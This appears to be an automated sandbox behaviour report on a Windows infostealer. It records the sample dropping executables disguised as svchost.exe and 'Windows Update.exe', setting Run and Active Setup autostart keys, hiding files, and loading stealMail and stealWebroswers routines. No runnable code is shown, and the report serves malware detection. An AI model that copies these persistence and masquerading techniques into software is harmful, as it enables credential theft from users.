                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeAutomated click: OK
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dllJump to behavior
                    Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\SYSTEM32\winnlsres.dlls.pdb source: svchost.exe, 0000000A.00000002.490336011.00000000010A9000.00000004.00000001.sdmp
                    Source: Binary string: symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: System.Windows.Forms.pdb5c5619 source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: taskhost.exe, iExplorer.exe, Windows Update.exe
                    Source: Binary string: mscorlib.pdbndows Update.exe source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\mscorlib.pdbd source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: rlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb source: svchost.exe, 0000000A.00000002.491122955.0000000001513000.00000004.00000001.sdmp
                    Source: Binary string: mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: 1?pC:\Windows\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Windows.Forms.pdbl source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: taskhost.exe, iExplorer.exe, Windows Update.exe
                    Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: taskhost.exe, iExplorer.exe, Windows Update.exe, vbc.exe, 00000014.00000002.274318737.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: ws\System.Windows.Forms.pdbpdbrms.pdb source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb.p source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\System.Windows.Forms.pdbsys source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbH source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: kC:\Windows\dll\System.Windows.Forms.pdb source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\System.pdb source: svchost.exe, 0000000A.00000002.491122955.0000000001513000.00000004.00000001.sdmp

                    Data Obfuscation:

                    barindex
                    .NET source code contains potential unpackerShow sources
                    Source: taskhost.exe.1.dr, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: taskhost.exe.1.dr, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: taskhost.exe.1.dr, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: taskhost.exe.1.dr, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: iExplorer.exe.1.dr, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: iExplorer.exe.1.dr, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: iExplorer.exe.1.dr, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: iExplorer.exe.1.dr, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: WindowsUpdate.exe.5.dr, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: WindowsUpdate.exe.5.dr, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: WindowsUpdate.exe.5.dr, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: WindowsUpdate.exe.5.dr, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Windows Update.exe.7.dr, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Windows Update.exe.7.dr, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Windows Update.exe.7.dr, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Windows Update.exe.7.dr, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_00A30712 push eax; ret 5_2_00A30726
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_00A30712 push eax; ret 5_2_00A3074E
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_00A0B87E push ecx; ret 5_2_00A0B88E
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_00A0BA9D push eax; ret 5_2_00A0BAB1
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_00A0BA9D push eax; ret 5_2_00A0BAD9
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_02B07EF2 push eax; ret 5_2_02B07EF5
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_052049A9 push edx; ret 5_2_052049AA
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_052049AB push edx; ret 5_2_052049AE
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_052049AF push edx; ret 5_2_052049B2
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05204B87 push esi; ret 5_2_05204B8A
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05204B8B push edi; ret 5_2_05204B92
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05204830 push ecx; ret 5_2_05204832
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05204833 push ecx; ret 5_2_0520483A
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05200016 push es; ret 5_2_0520006A
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05204661 push eax; ret 5_2_05204662
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05204663 push eax; ret 5_2_0520466A
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05204A59 push ebx; ret 5_2_05204A5A
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05204AA9 push ebx; ret 5_2_05204AAA
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05204AE7 push esp; ret 5_2_05204AEA
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05204ADF push ebx; ret 5_2_05204AE2
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_0073F44E push eax; ret 7_2_0073F462
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_0073F44E push eax; ret 7_2_0073F48A
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_0071A5BA push ecx; ret 7_2_0071A5CA
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_0071A7D9 push eax; ret 7_2_0071A7ED
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_0071A7D9 push eax; ret 7_2_0071A815
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_0043F44E push eax; ret 8_2_0043F462
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_0043F44E push eax; ret 8_2_0043F48A
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_0041A5BA push ecx; ret 8_2_0041A5CA
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_0041A7D9 push eax; ret 8_2_0041A7ED
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_0041A7D9 push eax; ret 8_2_0041A815
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 8_2_00CA6063 pushad ; retf 0000h8_2_00CA6072
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_00405CAA GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405CAA
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.57942816891

                    Persistence and Installation Behavior:

                    barindex
                    Drops PE files with benign system namesShow sources
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile created: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeFile created: C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exeJump to dropped file
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeFile created: C:\Users\user\AppData\Local\Temp\taskhost.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeFile created: C:\Users\user\AppData\Roaming\Windows Update.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows Firewall\WIN32.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeFile created: C:\Users\user\AppData\Roaming\WindowsUpdate.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile created: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeFile created: C:\Users\user\AppData\Local\Temp\iExplorer.exeJump to dropped file

                    Boot Survival:

                    barindex
                    Creates multiple autostart registry keysShow sources
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows UpdateJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run server host protocol windowsJump to behavior
                    Creates an undocumented autostart registry key Show sources
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{663zMYl1-971G-Rz79-18o0-8F397xVI0j0L} stubpathJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run server host protocol windowsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run server host protocol windowsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run server host protocol windowsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run server host protocol windowsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows UpdateJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows UpdateJump to behavior

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Changes the view of files in windows explorer (hidden files and folders)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
